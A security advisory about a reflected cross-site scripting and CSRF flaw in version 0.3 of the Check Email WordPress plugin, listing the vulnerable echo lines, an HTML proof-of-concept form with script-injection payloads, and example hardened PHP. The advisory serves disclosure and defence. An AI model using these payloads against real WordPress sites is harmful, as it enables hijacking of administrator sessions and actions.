WordPress Check Email 0.3 Cross Site Scripting

Posted Nov 20, 2016
Authored by Securify B.V., Antonis Manaras

WordPress Check Email plugin version 0.3 suffers from a cross site scripting vulnerability.

tags | exploit, xss
MD5 | 374f851d055a4d3e19c54e9422ba8001

------------------------------------------------------------------------
Cross-Site Scripting in Check Email WordPress Plugin
------------------------------------------------------------------------
Antonis Manaras, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Check Email
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160725-0009

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Check Email WordPress Plugin
version 0.3.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
The issue is fixed in Check Email version 0.5.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_check_email_wordpress_plugin.html

A Reflected Cross-Site Scripting vulnerability exists in the Check Email WordPress plugin. This vulnerability allows an attacker to perform any action with the privileges of the admin user. The affected code is not protected with an anti-Cross-Site Request Forgery token. Consequently, it can be exploited by luring the target user into clicking a specially crafted link or visiting a malicious website (or advertisement).

The vulnerability exists in the file check-email/check-email.php:

132: echo $_POST["checkemail_mime"];

140: echo $_POST["checkemail_type"];

148: echo $_POST["checkemail_from"];

156: echo $_POST["checkemail_cc"];


The vulnerability can be exploited using specially crafted URL parameters. In order to exploit this issue the target user must click a specially crafted link or visit a malicious website (or advertisement).


Proof of concept

<html>
<body>
<form action="http://172.16.52.198/wp-admin/tools.php?page=checkemail" method="POST">
<input type="hidden" name="checkemail_to" value="" />
<input type="hidden" name="checkemail_headers" value="custom" />
<input type="hidden" name="checkemail_mime" value="&quot;&gt;&lt;img src=x onerror=alert(1) /&gt;" />
<input type="hidden" name="checkemail_type" value="&quot;&gt;&lt;img src=x onerror=alert(2) /%3" />
<input type="hidden" name="checkemail_from" value="&quot;&gt;&lt;img src=x onerror=alert(3) /&gt;" />
<input type="hidden" name="checkemail_cc" value="&quot;&gt;&lt;/textarea&gt;&lt;script&gt;alert(4);&lt;/script&gt;" />
<input type="hidden" name="checkemail_break" value="\n" />
<input type="hidden" name="checkemail_go" value="Send test email" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
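
The two defects described above (raw echo of POST values and no anti-CSRF token) shown in hardened form, as an added example that is not the plugin's code or its 0.5 fix. It assumes the mime, type and from values are reflected into input value attributes and the cc value into a textarea, as the breakout strings in the proof of concept suggest; the helper names, the checkemail_nonce field and the HMAC token are hypothetical.

```php
<?php
// Added example, not the plugin's code. Helper names, the checkemail_nonce
// field and the HMAC token are hypothetical. In a WordPress plugin, esc_attr(),
// esc_textarea(), wp_nonce_field() and check_admin_referer() fill these roles.

const ATTR_FIELDS = ['checkemail_mime', 'checkemail_type', 'checkemail_from'];

// Token bound to the logged-in user; a real nonce would also expire.
function issue_token(string $secret, string $user): string {
    return hash_hmac('sha256', 'checkemail|' . $user, $secret);
}

function token_ok(array $post, string $secret, string $user): bool {
    $sent = $post['checkemail_nonce'] ?? '';
    return is_string($sent) && hash_equals(issue_token($secret, $user), $sent);
}

// Encode &, <, >, " and ' so a value cannot close an attribute or a tag.
function esc(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function field(array $src, string $name): string {
    return is_string($src[$name] ?? null) ? $src[$name] : '';
}

function render_form(array $post, string $secret, string $user): string {
    // A cross-site POST carries no valid token, so none of its values are reflected.
    $src  = token_ok($post, $secret, $user) ? $post : [];
    $html = sprintf('<input type="hidden" name="checkemail_nonce" value="%s" />' . "\n",
                    esc(issue_token($secret, $user)));
    foreach (ATTR_FIELDS as $name) {
        $html .= sprintf('<input type="text" name="%s" value="%s" />' . "\n",
                         $name, esc(field($src, $name)));
    }
    return $html . '<textarea name="checkemail_cc">' . esc(field($src, 'checkemail_cc')) . "</textarea>\n";
}

// Constructed input: harmless markup that would break out of each context if echoed raw.
$secret = 'constructed-demo-secret';
$post = [
    'checkemail_from'  => '"><b>from</b>',
    'checkemail_cc'    => '</textarea><b>cc</b>',
    'checkemail_nonce' => issue_token($secret, 'admin'),
];
echo "--- same-site request with valid token ---\n", render_form($post, $secret, 'admin');
unset($post['checkemail_nonce']);
echo "--- forged request without token ---\n", render_form($post, $secret, 'admin');
```

With the token present, the submitted markup comes back entity-encoded inside the attribute and the textarea; without it, the fields render empty.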



------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.
